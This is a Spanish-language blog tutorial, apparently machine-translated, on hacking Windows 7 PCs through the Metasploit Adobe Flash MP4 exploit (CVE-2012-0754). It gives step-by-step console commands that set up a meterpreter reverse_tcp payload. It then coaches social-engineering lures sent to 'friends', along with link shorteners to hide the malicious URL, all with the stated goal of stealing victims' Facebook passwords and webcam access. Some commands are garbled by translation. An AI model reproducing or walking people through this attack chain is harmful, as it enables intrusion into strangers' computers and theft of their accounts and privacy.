Hacking PC Win7 , 8 con URL Adobe Flash MP4 (Facebook, IMVU)

Hacking avanzado Hackear una PC con  con un archivo Adobe Flash MP4 malicioso (Hackear Windows XP,7,8)





Hoy veremos como introducirnos a una PC con Meterpreter & obtener contraseƱas de sus redes sociales (Facebook, IMVU), hackeo de webcam, etcĆ©tera.  

Infectando una URL maliciosa con un documento Adobe FLASH 











 
Flash y los otros productos de Adobe han tenido una mala reputación para el diseƱo de mala calidad e inseguro durante bastante tiempo ahora. 
 
El problema es tan grave, que Apple no permitirĆ” Flash en su sistema operativo iOS, lo que enfureció a muchos usuarios, pero manteniendo iOS mĆ”s seguro y eficiente de la energĆ­a (cuando Flash se bloquea, se absorbe la energĆ­a de la baterĆ­a y se bloquea con frecuencia, ya que todos sabemos demasiado bien).  
En un tutorial anterior, he mostrado cómo encontrar vulnerabilidades utilizando el SecurityFocus base de datos. Vamos a ir allí de nuevo y echar un vistazo a las vulnerabilidades de Adobe Flash.
 
http://www.securityfocus.com/ 







Paso 1: la bĆŗsqueda de vulnerabilidades

 

 

Cuando vamos a securityfocus y buscamos la base de datos para Adobe y Flash Player, obtenemos 8 pĆ”ginas de vulnerabilidades con 20 vulnerabilidades por pĆ”gina. Es obvio de esta lista que Flash estĆ” desgarrado con problemas de seguridad.  
 
PodrĆ­amos pasar semanas de pasar y pasar por todas las vulnerabilidades de Adobe Flash Player, pero voy a dejar eso para que usted haga. XD
 
 
 
 
 
 
Si usted estĆ” buscando una vulnerbailidad para  atacar a un equipo en una red, lo mejor que puedes hacer es pasar tu tiempo enfocado en Adobe Flash. Hay tantas vulnerabilidades y otros nuevas llegan a diario!

Paso 2: Elija Uno

Echemos un vistazo a una vulnerabilidad conocida como CVE-2012-0754, una corrupción de memoria remota. Fue encontrado  en febrero de 2012 y consiste en el uso de un archivo .mp4 daƱado para crear un desbordamiento de bĆŗfer en Flash que permite al atacante ejecutar su propio código. Tenga en cuenta que funciona para Adobe Flash Player a travĆ©s 11.1.
 
 
 
 
 
 

 
 
Cuando hacemos clic en la pestaƱa en la parte superior de la pĆ”gina, que nos lleva a un enlace a la explotación. A continuación, puede descargar o copiar y pegar  para su uso.

 

 

 Paso 3: Utilice Metasploit

 UsarĆ© el poderoso Backtrack 5

 

  

Abrimos nuestro Metasploit y buscamos las ejecucciones construidas para aprovechar las vulnerabilidades de Adobe Flash Player. BĆŗsqueda de "flash" con el siguiente comando.
  • msf> flash de bĆŗsqueda
 
 
 
 
 
 
 
Cuando lo hago, encuentro numerosas ejecucciones flash, pero he destacado la que estamos usando aquĆ­ y corresponde a CVE-2.012 a 0754. Ahora vamos a usarlo.
  • msf> uso exploit / windows / browser / adobe_flash_mp4_cprt
Cuando hacemos eso, cargarÔ el exploit en la consola. Ahora vamos a llegar mÔs información sobre el mismo.
  • msf> Información
 
 
 
 
 
Vuelve Metasploit para nosotros alguna información bĆ”sica sobre el exploit. He destacado la descripción en la imagen de arriba. En esta información, tambiĆ©n podemos ver que esta explotación tiene "objetivos". Para obtener los resultados mĆ”s fiables, que desea establecer el objetivo.  
En nuestro caso aquí, vamos después de que Windows 7 con IE8 (recuerda, IE8 vino como por defecto en Windows 7 y sigue siendo el navegador mÔs utilizado con el 21,2% del mercado), así que se fijó el objetivo a 6.
  • msf> conjunto de objetivos 6

 

 

Paso 4: Establecer opciones

Lo siguiente que necesitamos para configurar nuestras opciones. Podemos ver las opciones escribiendo el siguente comando:
  • Opciones msf> ver
Tenemos que establecer el SVRHOST y el payload en un mínimo. También podríamos establecer el SVRPORT, el URIPATH, y la configuración de SSL, pero vamos a dejar estos en sus valores predeterminados aquí.
  • msf> set SVRHOST 192.168.1.104
  • ventanas msf> conjunto de carga Ćŗtil / meterpreter / reverse_tcp
 
 
 
 
 
 
 
Una vez que hemos creado el payload, una vez mƔs tenemos que comprobar las opciones que tienen su propio conjunto de opciones. Cuando lo hacemos, vemos que tenemos que establecer el LHOST (la IP de nuestra mƔquina local) para el meterpreter.
  • msf> set LHOST 192.168.1.104

Paso 5: Explotar!

 
Con todos los parĆ”metros que necesitamos fijados, lo Ćŗnico que tenemos  que hacer :
  • msf> exploit 
 
Esto ahora va a generar un archivo .mp4 corrupto y alojarlo en el servidor web Metasploit. Ahora tenemos que ser creativos y enviarlo a la vĆ­ctima y esperamos que haga clic en Ć©l. 
 
 
Ocuparemos de nuevo nuestra ingenieria social que nunca falla
 
Por ejemplo, usted podrĆ­a enviarlo a un "amigo", diciendo "Hola amigo :), visita este  nuevo metodo que encontrĆ© para ver hackear facebook:DDD" http://0.0.0.0:8080/euKme6FUzAK57Cl 
   
 
 
 
Entre otros ejemplos de ingenieria social...
 
 












Al hacer clic en Ć©l, Metasploit enviarĆ” el archivo .mp4 a su navegador y  creara de un desbordamiento de bĆŗfer para el hackeo de su PC, como se ve a continuación
 
 
 
 

 
 
 
 
Con un poco de suerte (este metodo no funciona el 100% de las veces, mĆ”s como 50%) ya que el link es muy obvio. 
 
 






 
Pero algo que me sirve a mi es un acortador de links >;) aumentando el porcentaje a 95%, si todo sale bien aparecerĆ”   el sĆ­mbolo del Meterpreter y usted serĆ” dueƱo de su sistema por completo.
 
https://adf.ly/
 
Si no has visto mi publicación de como usar "Meterpreter", sacar contraseƱas de los navegadores de la victima, capturas de webcam & mucho mĆ”s. te dejo el link aquĆ­ abajo: 
 
 
 
 
 
 
 
 
 
 
 
La piraterĆ­a en los sistemas operativos modernos es cada vez mĆ”s difĆ­cil, ya que Microsoft y otros proveedores de software de seguridad se vuelven mĆ”s enfocado. 
 
El hacker  siempre se puede encontrar una manera de entrar, si son persistentes y creativos.
 
Fuentes como SecurityFocus y otras bases de datos de vulnerabilidad (incluso propias de Microsoft) estĆ” registrando constantemente vulnerabilidades y el hacker  simplemente tiene que estar un paso adelante de los proveedores de software.
 


Mucha suerte 

Exploit

No hay comentarios:

Publicar un comentario

Nota: solo los miembros de este blog pueden publicar comentarios.

Instagram